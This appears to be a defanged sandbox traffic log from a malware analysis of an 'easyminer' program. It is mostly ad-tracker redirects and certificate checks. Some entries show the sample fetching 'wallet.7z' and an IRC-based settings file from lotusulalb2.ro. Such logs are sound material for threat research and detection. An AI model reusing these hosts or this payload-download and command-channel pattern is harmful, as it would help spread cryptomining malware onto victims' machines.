pr-2018 15:05:41 GMT..Set-Cookie: _cc_dc=1;Path=/;Domain=crwdcntrl.net
;Expires=Tue, 17-Apr-2018 15:05:41 GMT..X-Server: 172.25.10.191..Conte
nt-Length: 49..Connection: keep-alive..GIF89a...................!.....
..,...........T..;..<<< skipped >>>

GET /eyeota_user_sync HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: sync.adap.tv

Connection: Keep-Alive


HTTP/1.1 302 Found

Content-Type: text/plain

Location: //sync.adaptv.advertising.com/eyeota_user_sync?

Server: ribs2.0

Content-Length: 0

Connection: keep-alive

HTTP/1.1 302 Found..Content-Type: text/plain..Location: //sync.adaptv.
advertising.com/eyeota_user_sync?..Server: ribs2.0..Content-Length: 0.
.Connection: keep-alive..

GET /upi/pid/lons7jax?redir=http://ps.eyeota.net/match?uid=${TM_USER_ID}&bid=0rijhbu HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: sync-tm.everesttech.net

Connection: Keep-Alive


HTTP/1.1 302 Found

Date: Fri, 21 Jul 2017 15:05:42 GMT

Pragma: no-cache

Cache-Control: no-cache

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: CP="NOI DSP COR LAW PSAo PSDo IVAo IVDo OUR BUS UNI DEM"

Access-Control-Allow-Origin: *

Set-Cookie: everest_g_v2=g_surferid~WXIYRgAAAGbcCHPP;Path=/;Domain=.everesttech.net;Expires=Sat, 21-Jul-2018 15:05:42 GMT

X-PT: P=48

Location: hXXp://sync-tm.everesttech.net/ct/upi/pid/lons7jax?redir=http://ps.eyeota.net/match?uid=${TM_USER_ID}&bid=0rijhbu&_test=WXIYRgAAAGbcCHPP

Connection: close

Server: Jetty(9.3.8.v20160314)

GET /utsync.ashx?eid=50052&et=0&fp=2fTntY3H6YOSxIf_wdSMCfygOSDFrDPHL7c44QyB2zlI&return=http://ps.eyeota.net/match?bid=r8hrb20&uid=nil HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ml314.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: private

Cache-control: no-cache="set-cookie"

Content-Type: image/gif; charset=utf-8

Date: Fri, 21 Jul 2017 15:05:56 GMT

Expires: 0,Sat, 22 Jul 2017 11:05:56 GMT

Location: hXXp://ps.eyeota.net/match?bid=r8hrb20&uid=nil

p3P: CP="NON DSP COR ADMo PSAo DEVo BUS COM UNI NAV DEM STA"

Pragma: no-cache

Server: Microsoft-IIS/8.5

Set-Cookie: u=aHR0cDovL2Vhc3ltaW5lci5uZXQv; domain=ml314.com; expires=Fri, 21-Jul-2017 15:06:11 GMT; path=/

Set-Cookie: pi=5978151342365581796; domain=ml314.com; expires=Sat, 21-Jul-2018 15:05:56 GMT; path=/

Set-Cookie: AWSELB=C7FF65F30CC113EEFA706B66F27E091147E9236E17A38A36D7C55E08A98E4FF82DD4C87D2C6ABA76EC25C2285D97A2515D35154D4972752E5C2843D894CEF5360FFC8070EA;PATH=/;MAX-AGE=3600

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Content-Length: 167

Connection: keep-alive
<html><head><title>Object moved</title></he
ad><body>..<h2>Object moved to <a href="hXXp://ps.ey
eota.net/match?bid=r8hrb20&uid=nil">here</a>.</h2>.
.</body></html>..HTTP/1.1 302 Found..Cache-Control: privat
e..Cache-control: no-cache="set-cookie"..Content-Type: image/gif; char
set=utf-8..Date: Fri, 21 Jul 2017 15:05:56 GMT..Expires: 0,Sat, 22 Jul
 2017 11:05:56 GMT..Location: hXXp://ps.eyeota.net/match?bid=r8hrb20&u
id=nil..p3P: CP="NON DSP COR ADMo PSAo DEVo BUS COM UNI NAV DEM STA"..
Pragma: no-cache..Server: Microsoft-IIS/8.5..Set-Cookie: u=aHR0cDovL2V
hc3ltaW5lci5uZXQv; domain=ml314.com; expires=Fri, 21-Jul-2017 15:06:11
 GMT; path=/..Set-Cookie: pi=5978151342365581796; domain=ml314.com; ex
pires=Sat, 21-Jul-2018 15:05:56 GMT; path=/..Set-Cookie: AWSELB=C7FF65
F30CC113EEFA706B66F27E091147E9236E17A38A36D7C55E08A98E4FF82DD4C87D2C6A
BA76EC25C2285D97A2515D35154D4972752E5C2843D894CEF5360FFC8070EA;PATH=/;
MAX-AGE=3600..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Cont
ent-Length: 167..Connection: keep-alive..<html><head><t
itle>Object moved</title></head><body>..<h2>
;Object moved to <a href="hXXp://ps.eyeota.net/match?bid=r8hrb20&am
p;uid=nil">here</a>.</h2>..</body></html>..
..<<< skipped >>>

GET /s/opensans/v14/k3k702ZOKiLJc3WVjuplzIraN7vELC11_xip9Rz-hMs.woff HTTP/1.1

Accept: */*

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://easyminer.net

Accept-Encoding: gzip, deflate

Host: fonts.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: font/woff

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Content-Length: 24952

Date: Wed, 14 Jun 2017 16:51:29 GMT

Expires: Thu, 14 Jun 2018 16:51:29 GMT

Last-Modified: Wed, 14 Jun 2017 16:45:58 GMT

X-Content-Type-Options: nosniff

Server: sffe

X-XSS-Protection: 1; mode=block

Cache-Control: public, max-age=31536000

Age: 3190451
wOFF......ax................................GDEF......."...".y..GPOS..
..............GSUB.......X...t.W..OS/2.......[...`.l#-cmap...h........
.z..cvt ...H...].....-..fpgm.............s.ugasp...L............glyf..
.X..N...~.J.T.head..W....6...6.%I.hhea..WH... ...$.)..hmtx..Wh........
#Yw.loca..ZP............maxp..\.... ... ....name..\........D..1;post..
].............prep..`............k.........................3...5.E....
................x......P...s..I.....(............<p8....|..O..<.
.}... z}.....wptv..F............."......x.c`f.g......:.....Q.B3_dHc...
.............................JBl..D.Z8z."......X.X..)..f.=..3.x.}O%TDQ
......0h'..w.X?....x/t...Pq.....x.3... X.......... d ....2..P.i..f.`g.
.....n.~.....p...I..t...{(.@4:..X..F......].e..}.)~......V..V{j.f5..T.
..rl9..1......h.u.u.u.......9...i........~....(.S...f1G).../`.KX.xJ...
}...N.x.c.a.g``..$KY...e@.,q@.j...o@<..O.H.t.................c .p@.
.........3lbd.....-.}.M...!...!....x..TGw.F.........)..)7..W..`*.j.-..
.=*'_..sI...2...O>....[tt....TK]..|...G.................^.m..=..x..
q... ./].p....'..k...T.......V..v...|nhp.....&....UE...'.V.&...[.y..AD
....D.Z....P.H...L..Z...tRKg....*.J)...]).|zL... ...Z.C2zh...m........
o.c/t1^R,4es.P...PD.......~.:..q....,W. ......1...m...(....XS...&...b.
JgK".=...&......\.....}.>/.?..18"]8......<....1.zk|#..........c.
.....#Q..V...D0....M..q.q.K..a.u.tf.0e..J...... ..?\.._.....r......=c/
 0..hG....i_............i..McX.:l.....T.l.Za..c..!1.z..)b:=f.=.6.fB.._
....N|)......Z.4a...-...q.D.m.........$...x7......~.[1......0...^.<<< skipped >>>

GET /easyminer/ip.php HTTP/1.1

Connection: Keep-Alive

Host: lotusulalb2.ro

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


HTTP/1.1 200 OK

Cache-Control: public, max-age=3600

Expires: Fri, 21 Jul 2017 16:06:06 GMT

Content-Type: text/html

Content-Length: 92

Date: Fri, 21 Jul 2017 15:06:06 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Connection: close

194.242.96.218,127.0.0.1,72,false,%hXXp://openradiodirectory.com,%&,%t
ruer,%truec,%trued,%xd..

GET /easyminer/wallet.7z HTTP/1.1

User-Agent: JEDI-VCL

Host: lotusulalb2.ro

Cache-Control: no-cache


HTTP/1.1 200 OK

Last-Modified: Sun, 12 Mar 2017 18:40:25 GMT

Content-Type: application/x-7z-compressed

Content-Length: 803815

Date: Fri, 21 Jul 2017 15:06:01 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Connection: Keep-Alive
7z..'.....G..C......$........W#...h........D..........=.c.J...g.....bK
.A.B. ..}Leo...@..nd.?G..W.x..~..I[} ^..SQ...GU.|?...[X...N.....?..D..
......-..w...M.....y#`{.m.....a..B.......s.o#..g....mp.Z.-......o.c.O$
-...w..K>..G:.4gT....}...c....zM;.#......N#..g....M.......M m......
......2m..H...Q.V"..E'.W...p..vu...Y]mH.......d....q^.[2.Q.-....B.|.K.
;`?....._?..kN. ^M!.A,....f.6&p..c.Z..f!......]D..E....>....j......
H....<<..Z.V..h..5;'.j....u.7......PQ,...~...6H7'...@.....&L...G
x...._T#.`ydu..G..."'.wsa.....{..Y...........|.n...N...{b.w.......&Q.)
.I..}JZ..r.H....6xO'.R.T r...:..T<.....o\...O...2....s.Q2.S.<...
.0X.\dM..O@..F...m...&uF\....".L......).s$.>...5....x%S.3..'....t..
(...aV..........pm.....d.p...:%....K.:.....rr!....sF..X3'..w#..2..L...
.=....?...@..9lq.,..F....O.F..W"{.C...8.L.1..R.O~....s.M7R...#/.......
.."...1.P.<..I:1`.....^.p.f..s..H#.d...#Y.......W...Cv......ux..'k.
|.....6.Is.W..U...-.......K.!7..\(.5.r..._.@Q......w>..%.n.~fx./.e.
...7.^..[1.......k...I.z.p.>lQ.......;8<.{.A..p....b..Ugo..K...z
ln[...[t%....E^6>....O ..E...}..0D.C.B...Qh.z.g.....|.R..]. .A.2.e.
....Y.!......w...fG,..........[X...o.....dn<........2h.tH[.9.......
..N..........F.......,{nb.l/.......C......a..n..<..(..u..sy..O&>
..6.......aC._..;..*........{...EAB......*"\...X9..p..JdF<.._..(..~
..c"Q..a.40.<.3I..6~....CQ..N.@D......\.....B.....9v.|.a....IC....Q
p/.......8.m..:5...2.....f. .!=....6.|..v>D.... V..fX..|Q..0..].Pz.
.9.......Q...R4n.k....{.|.[.......k%..H....{...`/B.B...}kiR2G.e.o.<<< skipped >>>

GET /r/dd/id/L2NzaWQvMS9jaWQvMjg0NTA1NDYvdC8w/url/hXXp://ps.eyeota.net/match?bid=1mpjpn0&turn_id=$!{TURN_UUID}&newuser=1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: d.turn.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: Apache-Coyote/1.1

P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"

Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0

Pragma: no-cache

Set-Cookie: uid=2489555661493901901; Domain=.turn.com; Expires=Wed, 17-Jan-2018 15:05:47 GMT; Path=/

Location: hXXp://ps.eyeota.net/match?bid=1mpjpn0&turn_id=2489555661493901901&newuser=1

Content-Length: 0

Date: Fri, 21 Jul 2017 15:05:47 GMT
HTTP/1.1 302 Found..Server: Apache-Coyote/1.1..P3P: policyref="/w3c/p3
p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"..C
ache-Control: max-age=0, no-cache, no-store, private, must-revalidate,
 s-maxage=0..Pragma: no-cache..Set-Cookie: uid=2489555661493901901; Do
main=.turn.com; Expires=Wed, 17-Jan-2018 15:05:47 GMT; Path=/..Locatio
n: hXXp://ps.eyeota.net/match?bid=1mpjpn0&turn_id=2489555661493901901&
newuser=1..Content-Length: 0..Date: Fri, 21 Jul 2017 15:05:47 GMT..

GET /sync/img?mt_exid=10015&redir=http://ps.eyeota.net/match?bid=7vi0rg0&uid=[MM_UUID]&mm_bnc&mm_bct HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: sync.mathtag.com

Connection: Keep-Alive

Cookie: uuid=aa6a5972-184b-4000-aa4d-0096e5ec7490


HTTP/1.1 302 Moved Temporarily

Date: Fri, 21 Jul 2017 15:05:47 GMT

Content-Type: image/gif

Content-Length: 0

Connection: keep-alive

Keep-Alive: timeout=360

Cache-Control: no-cache

location: hXXp://ps.eyeota.net/match?bid=7vi0rg0&uid=aa6a5972-184b-4000-aa4d-0096e5ec7490

P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"

Server: MT3 1.15.10.0 a38180b RELEASE cdg-pixel-x9

Set-Cookie: uuidc=Zlom5FdMAD2lSdAUB4LGq1se6kDFkA3f7jzJrtUZDtWITF9LGxwO8UZFDVa2g5tDD4Y2UyOm esyFW3EE99UZWHfaFOEDwJ5aAnAgURtnAE=; Expires=Sat, 18-Aug-18 15:05:47 GMT; Domain=.mathtag.com; Path=/

Expires: Fri, 21 Jul 2017 15:05:46 GMT

HTTP/1.1 302 Moved Temporarily..Date: Fri, 21 Jul 2017 15:05:47 GMT..C
ontent-Type: image/gif..Content-Length: 0..Connection: keep-alive..Kee
p-Alive: timeout=360..Cache-Control: no-cache..location: hXXp://ps.eye
ota.net/match?bid=7vi0rg0&uid=aa6a5972-184b-4000-aa4d-0096e5ec7490..P3
P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PU
R STA"..Server: MT3 1.15.10.0 a38180b RELEASE cdg-pixel-x9..Set-Cookie
: uuidc=Zlom5FdMAD2lSdAUB4LGq1se6kDFkA3f7jzJrtUZDtWITF9LGxwO8UZFDVa2g5
tDD4Y2UyOm esyFW3EE99UZWHfaFOEDwJ5aAnAgURtnAE=; Expires=Sat, 18-Aug-18
 15:05:47 GMT; Domain=.mathtag.com; Path=/..Expires: Fri, 21 Jul 2017 
15:05:46 GMT..

GET /serving/cookie/match/?party=1009 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: dmp.adform.net

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: nginx

Date: Fri, 21 Jul 2017 15:05:42 GMT

Content-Length: 0

Connection: keep-alive

Keep-Alive: timeout=15

Location: hXXp://dmp.adform.net/serving/cookie/match/?CC=1&party=1009

Set-Cookie: uid=5968840930698789580; Expires=Tue, 19 Sep 2017 15:05:42 GMT; Domain=adform.net; Path=/
HTTP/1.1 302 Found..Server: nginx..Date: Fri, 21 Jul 2017 15:05:42 GMT
..Content-Length: 0..Connection: keep-alive..Keep-Alive: timeout=15..L
ocation: hXXp://dmp.adform.net/serving/cookie/match/?CC=1&party=1009..
Set-Cookie: uid=5968840930698789580; Expires=Tue, 19 Sep 2017 15:05:42
 GMT; Domain=adform.net; Path=/..

GET /easyminer/settings.xml HTTP/1.1

Connection: Keep-Alive

Host: lotusulalb2.ro

Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36


HTTP/1.1 200 OK

Cache-Control: public, max-age=3600,public, must-revalidate, proxy-revalidate

Expires: Fri, 21 Jul 2017 16:06:06 GMT

Last-Modified: Mon, 21 Dec 2015 19:02:58 GMT

Content-Type: text/xml

Content-Length: 2463

Date: Fri, 21 Jul 2017 15:06:06 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
<?xml version="1.0"?>.<NetChatLink>..<CheckUpdates>0
</CheckUpdates>..<AutoConnect>0</AutoConnect>..<S
tartup>0</Startup>..<PID>UP4Z5OJI4P3CWPUUNWFWYFRPGJF3QK
W6IZZQYJI</PID>..<Words/>..<Hubs/>..<Ircs>...&
lt;Item>....<Name>Server1aaaaa</Name>....<Server>
chat.freenode.net:6665</Server>....<Nick>^|playa_XE</Ni
ck>....<Pass/>....<Prefix>[radio]</Prefix>....<
;Ident/>....<Chans>#bitcoinsoftware</Chans>....<MsgR
ate>0</MsgRate>....<PMRate>0</PMRate>....<Show
JP>0</ShowJP>....<OPsCon>0</OPsCon>....<Enable
d>1</Enabled>....<From>0</From>....<To>0<
;/To>....<Users/>....<Startup/>...</Item>...<I
tem>....<Name>Serveraaaa1</Name>....<Server>chat.
freenode.net:6666</Server>....<Nick>^|playa_XE</Nick>
;....<Pass/>....<Prefix>[radio]</Prefix>....<Iden
t/>....<Chans>#bitcoinsoftware</Chans>....<MsgRate&g
t;0</MsgRate>....<PMRate>0</PMRate>....<ShowJP>
;0</ShowJP>....<OPsCon>0</OPsCon>....<Enabled>
1</Enabled>....<From>0</From>....<To>0</To&
gt;....<Users/>....<Startup/>...</Item>...<Item&g
t;....<Name>Servaaaaaer1</Name>....<Server>chat.free
node.net:6667</Server>....<Nick>^|playa_XE</Nick><<< skipped >>>

GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1+30c7dH4b0W1Ws3NcQwg6piOcCAzkUhA== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.starfieldtech.com


HTTP/1.1 200 OK

Date: Fri, 21 Jul 2017 15:05:53 GMT

Server: Apache

Content-Transfer-Encoding: Binary

Cache-Control: max-age=119047, public, no-transform, must-revalidate

Last-Modified: Fri, 21 Jul 2017 13:54:26 GMT

Expires: Sun, 23 Jul 2017 01:54:26 GMT

ETag: "ffc31f5ba89f470c3bf712250ac481c986ef52b2"

P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"

Content-Length: 1738

Connection: close

Content-Type: application/ocsp-response
0..........0..... .....0......0...0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1%0#..U....Starfield Technologies, Inc.110/.
.U...(Starfield Root Validation Authority - G1..20170721135426Z0f0d0&l
t;0... ............[..a.Ti!.h...3m...._.......[U...........9......2017
0721135426Z....20170723015426Z0...*.H.................^.^........-..~-
..:`....-.,.....r.....f...j.90.a.r<I........(..OT..?q...^...z...*nC
.W.g.D.F]...k........V.u .v....... ..l....-.,..C...FA.M....r...Kq_.|e.
;4..~uS......u..........`4.....eK...F4w%...#P...9Q.....z..-'...H....r.
.?J.j...V.G.....HE$.U4. ..w......0..{0..w0.._.......(...M..B0...*.H...
.....0h1.0...U....US1%0#..U....Starfield Technologies, Inc.1200..U...)
Starfield Class 2 Certification Authority0...161214070000Z..2112140700
00Z0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1%0#..U....S
tarfield Technologies, Inc.110/..U...(Starfield Root Validation Author
ity - G10.."0...*.H.............0.............}...@.H..........j.b.2.c
....'eSA.....6""2.hf.m.m9........_N."gV..{.J"{..0f.W$.Xr....|U.F.!.K.0
 .(p......9.I......c.c\.9.xt.v.UN...%....,R....ZJ......rz.Z..p...ru.6.
....0..t....*...T.W.....?...X...( ..z.[. .A... z.[>-.y>...nvU...
g.wU........ Fh.6F...}.........0..0...U.......0.0...U...........0...U.
%..0... .......0...U........J!~...}....^].....0... .....0......0C..U..
.<0:08.6.4.2hXXp://crl.starfieldtech.com/repository/sfroot.crl0P..U
. .I0G0E..`.H...n....0604.. ........(hXXp://crl.starfieldtech.com/repo
sitory/0...*.H..................H.... ..~C.&...N..y..~.j}.'..Me...<<< skipped >>>

GET /5/c=3825/tp=DTSC/tpid=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: bcp.crwdcntrl.net

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: no-cache

Date: Fri, 21 Jul 2017 15:05:42 GMT

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Location: hXXp://bcp.crwdcntrl.net/5/ct=y/c=3825/tp=DTSC/tpid=2DE7B66B4518725926432CB1022296DF

P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV

Pragma: no-cache

Set-Cookie: _cc_cc=ctst;Path=/;Domain=crwdcntrl.net

X-Server: 172.25.11.196

Content-Length: 0

Connection: keep-alive

HTTP/1.1 302 Found..Cache-Control: no-cache..Date: Fri, 21 Jul 2017 15
:05:42 GMT..Expires: Thu, 01 Jan 1970 00:00:00 GMT..Location: hXXp://b
cp.crwdcntrl.net/5/ct=y/c=3825/tp=DTSC/tpid=2DE7B66B4518725926432CB102
2296DF..P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV..Pragma: no-
cache..Set-Cookie: _cc_cc=ctst;Path=/;Domain=crwdcntrl.net..X-Server: 
172.25.11.196..Content-Length: 0..Connection: keep-alive..

GET /MFIwUDBOMEwwSjAJBgUrDgMCGgUABBQ1mI4Ww4R5LZiQ295pj4OF/44yyAQUyk7dWyc1Kdn27sPlU++kwBmWHa8CEQCSuHRPcc7Q4mxyo9jV2SWy HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.trustwave.com


HTTP/1.1 200 OK

Server: nginx

Content-Type: application/ocsp-response

Last-Modified: Thu, 20 Jul 2017 16:40:03 GMT

ETag: bfd7b3c17f7b6b9fbbe2ce4d43b5b35054f8225b

Expires: Mon, 24 Jul 2017 16:40:03 GMT

Cache-Control: max-age=60, public, no-transform, must-revalidate

Content-Length: 1684

Date: Fri, 21 Jul 2017 15:06:08 GMT

Connection: keep-alive

0..........0..... .....0.....v0..r0.....0}1&0$..U....Trustwave STCA OC
SP Responder1!0...U....Trustwave Holdings, Inc.1.0...U....Chicago1.0..
.U....Illinois1.0...U....US..20170720174003Z0t0r0J0... ........5.....y
-....i.....2....N.['5).....S............tOq...lr....%.....201707201640
03Z....20170724164003Z0...*.H.............VK....[z.7..<=_I........[
....f....U.x[.I #Ck.b............j3.G...vy..G.j..vL...h.........-...  
..;.Bf...G.-.y...=P.:..[....tDE..SrmAj.k.[..)bN.....`.3...4P.......T..
.&9>....l..........&...%..m..1.0.Q*..Oah2.#zy..%.... e[s$...W.%..e.
..@..|..`.H<.Xsu6cp.b2.....N0..J0..F0...............Y..e50.....I.d0
...*.H........0H1.0...U....US1 0...U....SecureTrust Corporation1.0...U
....SecureTrust CA0...170523124509Z..180523184509Z0}1&0$..U....Trustwa
ve STCA OCSP Responder1!0...U....Trustwave Holdings, Inc.1.0...U....Ch
icago1.0...U....Illinois1.0...U....US0.."0...*.H.............0........
....4B-......3.....~g...@.-l...z.....z.K..k...vNd..Y.....e..t.x._Y....
.......?Q....x.9`..5X..gp.&...4..XXx.5......3.....M..,.`:_..A..4v.....
..d.......u(...8i..R..Q...1..g3..&wJ...,........q..O#p..-...".S.$...a.
m.z,.|1...EG~ }%....%....U......(.M....ii...V.........0..0...U.......0
.0...U...........0...U.%..0... .......0...U.......kU/. .n....9..$.<
.M0...U.#..0...B2......]Kz...L@.ZC.02..U... 0)0'.%.#.!hXXp://crl.trust
wave.com/STCA.crl06.. ........*0(0&.. .....0...hXXp://ocsp.trustwave.c
om/0... .....0......0...*.H.............*e..N.r...9c4.....-O...(l5^x.#
........`...... ...%. .f......f.f.}...$T..gwU.......9..w...kDl.=..

<<< skipped >>>

GET //MFQwUjBQME4wTDAJBgUrDgMCGgUABBRKUAJ27jxxuy1zYtpUHfLy0MHHugQUys4dGAN3HhzzfFiymnCoCIAW9K4CEwarM81FRJBKpx5TRPzrMY8Wu/M= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.trustwave.com


HTTP/1.1 200 OK

Server: nginx

Content-Type: application/ocsp-response

Last-Modified: Thu, 20 Jul 2017 17:04:12 GMT

ETag: 81a0a5c8bb4199ba43c0dfd89a59cb75b7308d3b

Expires: Mon, 24 Jul 2017 17:04:12 GMT

Cache-Control: max-age=60, public, no-transform, must-revalidate

Content-Length: 638

Date: Fri, 21 Jul 2017 15:06:14 GMT

Connection: keep-alive
0..z......s0..o.. .....0.....`0..\0..D...0..1.0...U....US1.0...U....Il
linois1.0...U....Chicago1!0...U....Trustwave Holdings, Inc.1=0;..U...4
Trustwave Organization Validation SHA256 CA, Level 11.0...*.H........c
a@trustwave.com..20170720180412Z0v0t0L0... ........JP.v.<q.-sb.T...
...........w...|X..p..........3.ED.J..SD..1........20170720170412Z....
20170724170412Z0...*.H.............P.4...!.....L->.d..H.{...~4 ....
..h$v.....[...Br...=;X.......g0.f.q.Lx..j..`_...2..Is.[.g...../.5...=.
P..........mx.......F=........3%l.U....3.|.W.......m]..m.....7......(.
y...tl..D.e}7.D....<./.C%s....0j..>..j.|S.'}}......jy}s.......3.
?...<1.YU.......c.UxHTTP/1.1 200 OK..Server: nginx..Content-Type: a
pplication/ocsp-response..Last-Modified: Thu, 20 Jul 2017 17:04:12 GMT
..ETag: 81a0a5c8bb4199ba43c0dfd89a59cb75b7308d3b..Expires: Mon, 24 Jul
 2017 17:04:12 GMT..Cache-Control: max-age=60, public, no-transform, m
ust-revalidate..Content-Length: 638..Date: Fri, 21 Jul 2017 15:06:14 G
MT..Connection: keep-alive..0..z......s0..o.. .....0.....`0..\0..D...0
..1.0...U....US1.0...U....Illinois1.0...U....Chicago1!0...U....Trustwa
ve Holdings, Inc.1=0;..U...4Trustwave Organization Validation SHA256 C
A, Level 11.0...*.H........ca@trustwave.com..20170720180412Z0v0t0L0...
 ........JP.v.<q.-sb.T..............w...|X..p..........3.ED.J..SD..
1........20170720170412Z....20170724170412Z0...*.H.............P.4...!
.....L->.d..H.{...~4 ......h$v.....[...Br...=;X.......g0.f.q.Lx..j.
.`_...2..Is.[.g...../.5...=.P..........mx.......F=........3%l.U...<<< skipped >>>

GET /pixel?pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive


HTTP/1.1 302 Found

Set-Cookie: mako_uid=15d65aed1dd-30270000010f1a0b; Domain=eyeota.net; Path=/; Expires=Sat, 21 Jul 2018 03:05:42 GMT;

P3P: CP="CURa ADMa DEVa TAIo PSAo PSDo OUR SAMo BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", policyref="hXXp://ps.eyeota.net/w3c/p3p.xml"

Location: /pixel/bounce/?pid=ml62m40&t=ajs&uid=2DE7B66B4518725926432CB1022296DF

Content-Length: 0

Date: Fri, 21 Jul 2017 15:05:42 GMT
HTTP/1.1 302 Found..Set-Cookie: mako_uid=15d65aed1dd-30270000010f1a0b;
 Domain=eyeota.net; Path=/; Expires=Sat, 21 Jul 2018 03:05:42 GMT;..P3
P: CP="CURa ADMa DEVa TAIo PSAo PSDo OUR SAMo BUS UNI PUR INT DEM STA 
PRE COM NAV OTC NOI DSP COR", policyref="hXXp://ps.eyeota.net/w3c/p3p.
xml"..Location: /pixel/bounce/?pid=ml62m40&t=ajs&uid=2DE7B66B451872592
6432CB1022296DF..Content-Length: 0..Date: Fri, 21 Jul 2017 15:05:42 GM
T......


GET /match?bid=gdo9o51&newuser=1&google_gid=CAESEH0HDPTF3KGEcV-FDyOM0zI&google_cver=1 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

Cookie: mako_uid=15d65aed1dd-30270000010f1a0b


HTTP/1.1 200 OK

Content-Type: image/gif

Content-Length: 70

Date: Fri, 21 Jul 2017 15:05:42 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;
....

GET /match?uid=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&bid=1e2n4ou HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ps.eyeota.net

Connection: Keep-Alive

